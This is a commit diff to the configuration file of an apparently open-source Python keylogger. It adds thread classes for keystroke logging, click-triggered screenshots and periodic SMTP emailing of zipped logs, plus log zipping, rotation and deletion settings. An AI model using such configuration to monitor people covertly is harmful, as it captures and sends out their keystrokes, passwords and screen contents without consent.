start working on updating the main keylogger class update the ini and val files, mostly for click image capture.

--- a/pykeylogger.ini
+++ b/pykeylogger.ini
@@ -36,12 +36,16 @@ _Usage Time Flag = eJxLyywqLiktTgUAD3wDdg==
 # Name of class to instantiate to create this thread. Internal use only.
 _Thread_Class = DetailedLogWriterFirstStage
 
+# default: True
+Enable Logger Tooltip = Enable this logger.
+Enable Logger = True
+
 # default: detailedlog
 Log Subdirectory Tooltip = Use this subdirectory inside the main log directory for this logger.
 Log Subdirectory = detailed_log
 
 # default: logfile.txt
-Log Filename Tooltip = Log all output to the file (filename specified here) inside directory specified with "Log Directory".
+Log Filename Tooltip = Log all output to the file (filename specified here) inside directory specified with "Log Subdirectory".
 Log Filename = logfile.txt
 
 # default: False
@@ -74,6 +78,9 @@ Non-printing Character Representation = [KeyName:%keyname%]
 
 
 [[E-mail]]
+
+# Name of class to instantiate to create this thread. Internal use only.
+_Thread_Class = EmailLogSender
 
 # default: False
 SMTP Send Email Tooltip = Set to True to enable automatic periodic emails of a zipped archive of logfiles.
@@ -127,6 +134,9 @@ Email Interval = 4.0
 
 [[Zip]]
 
+# Name of class to instantiate to create this thread. Internal use only.
+_Thread_Class = LogZipper
+
 # default: False
 Zip Enable Tooltip = Set this to true to enable automatic zipping of logfiles to dated archives (and deletion of files that have been zipped).
 Zip Enable = False
@@ -171,7 +181,10 @@ Zip Interval = 4.0
 #~ FTP Interval Tooltip = Set this to the time interval between automatic FTP events, in HOURS.
 #~ FTP Interval = 4.0
 
-[[Log Maintenance]]
+[[Old Log Deletion]]
+
+# Name of class to instantiate to create this thread. Internal use only.
+_Thread_Class = OldLogDeleter
 
 # default: False
 Delete Old Logs Tooltip = Set to True to enable automatic deletion of old logs.
@@ -185,19 +198,43 @@ Max Log Age = 2.0
 Age Check Interval Tooltip = Set to the frequency of checking for and deleting logs older than maxLogAge, in HOURS.
 Age Check Interval = 2.0
 
+
+[[Log Flush]]
+
+# Name of class to instantiate to create this thread. Internal use only.
+_Thread_Class = LogFlusher
+
 # default: 120
 Flush Interval Tooltip = Specify the time interval between buffer autoflush events, in SECONDS.
 Flush Interval = 120.0
+
+[[Log Rotation]]
+
+# Name of class to instantiate to create this thread. Internal use only.
+_Thread_Class = LogRotator
 
 # default: 4.0
 Log Rotation Interval Tooltip = Specify the time interval between log rotation events, in HOURS.
 Log Rotation Interval = 4.0
 
-[Image Capture]
+[Click Image Capture]
+
+[[General]]
+
+# Name of class to instantiate to create this thread. Internal use only.
+_Thread_Class = OnClickImageCaptureFirstStage
 
 # default: True
 Capture Clicks Tooltip = Enable the capture of a partial screenshot at every mouse click. This functionality grabs an area around the mouse pointer with every click (size defined with the width and height settings in this panel). Images are stored in the 'images' subdirectory of the main Log Directory, in PNG format (other formats coming soon).
 Capture Clicks = True
+
+# default: detailedlog
+Log Subdirectory Tooltip = Use this subdirectory inside the main log directory for this logger.
+Log Subdirectory = click_images
+
+# default: logfile.txt
+Log Filename Tooltip = Log all output to the file (filename specified here) inside directory specified with "Log Subdirectory".
+Log Filename = logfile.txt
 
 # default: 150
 Capture Clicks Width Tooltip = Specify the width (in pixels) for the captured image around the mouse cursor. The coordinates of the mouse cursor during the click are the center of the image. Note that the larger the area you want to capture, the more disk space this will take.
@@ -214,3 +251,107 @@ Capture Clicks Image Format = png
 # default: 75
 Capture Clicks Image Quality Tooltip = Specify the image file quality of the images captured on click. This option only applies to the JPG file format. Specify a value from 1 to 100 (100 being completely uncompressed).
 Capture Clicks Image Quality = 75
+
+[[E-mail]]
+
+# Name of class to instantiate to create this thread. Internal use only.
+_Thread_Class = EmailLogSender
+
+# default: False
+SMTP Send Email Tooltip = Set to True to enable automatic periodic emails of a zipped archive of logfiles.
+SMTP Send Email = False
+
+# default: True
+SMTP Needs Login Tooltip = Set to True if your SMTP server requires a login with username/password.
+SMTP Needs Login = True
+
+# default: yourusername
+SMTP Username Tooltip = Set to your username for the SMTP server (only needed if your SMTP server requires a login).
+SMTP Username = yourusername
+
+# For security purposes, this value can only be set through the control panel, to avoid storing your password in plain text.
+# Setting it here directly will not work.
+# default: yourpassword
+SMTP Password Tooltip = Set to your password (only needed if your SMTP server requires a password).
+SMTP Password = eJyrzC8tKkgsLi7PL0oBACKaBUM=
+
+# default: smtp.gmail.com
+SMTP Server Tooltip = Set to the hostname of your SMTP server.
+SMTP Server = smtp.gmail.com
+
+# default: 587
+SMTP Port Tooltip = Set to the port of your SMTP server (Standard ports are: port 25 for no encryption; port 587 for TLS; port 465 for SSL)
+SMTP Port = 587
+
+# default: True
+SMTP Use TLS Tooltip = Set this to True to enable TLS encryption (a good idea if your server supports it).
+SMTP Use TLS = True
+
+# default: yourfromaddress@host.com
+SMTP From Tooltip = Set to the email address that you want to appear in the "From" line in your email.
+SMTP From = yourfromaddress@host.com
+
+# default: yourtoaddress@host.com
+SMTP To Tooltip = Set to the email address that you want to send email to. Separate multiple addresses semicolon ";".
+SMTP To = yourtoaddress@host.com
+
+# default: Automatic Logfile Email
+SMTP Subject Tooltip = Set to the text you want to appear in the Subject line in your email.
+SMTP Subject = Automatic Logfile Email
+
+# default: "Please see attached zipfile."
+SMTP Message Body Tooltip = Set to the text that you want to appear in the message body of your email.
+SMTP Message Body = Please see attached zipfile.
+
+# default: 4.0
+Email Interval Tooltip = Specify the time interval between automatic log email events, in HOURS.
+Email Interval = 4.0
+
+[[Zip]]
+
+# Name of class to instantiate to create this thread. Internal use only.
+_Thread_Class = LogZipper
+
+# default: False
+Zip Enable Tooltip = Set this to true to enable automatic zipping of logfiles to dated archives (and deletion of files that have been zipped).
+Zip Enable = False
+
+# default: 4.0
+Zip Interval Tooltip = Set this to the time interval between automatic zip events, in HOURS.
+Zip Interval = 4.0
+
+[[Old Log Deletion]]
+
+# Name of class to instantiate to create this thread. Internal use only.
+_Thread_Class = OldLogDeleter
+
+# default: False
+Delete Old Logs Tooltip = Set to True to enable automatic deletion of old logs.
+Delete Old Logs = False
+
+# default: 2.0
+Max Log Age Tooltip = Set to the maximum age of the logs that you want to keep, in DAYS. Logs older than this will be deleted.
+Max Log Age = 2.0
+
+# default: 2.0
+Age Check Interval Tooltip = Set to the frequency of checking for and deleting logs older than maxLogAge, in HOURS.
+Age Check Interval = 2.0
+
+
+[[Log Flush]]
+
+# Name of class to instantiate to create this thread. Internal use only.
+_Thread_Class = LogFlusher
+
+# default: 120
+Flush Interval Tooltip = Specify the time interval between buffer autoflush events, in SECONDS.
+Flush Interval = 120.0
+
+[[Log Rotation]]
+
+# Name of class to instantiate to create this thread. Internal use only.
+_Thread_Class = LogRotator
+
+# default: 4.0
+Log Rotation Interval Tooltip = Specify the time interval between log rotation events, in HOURS.
+Log Rotation Interval = 4.0
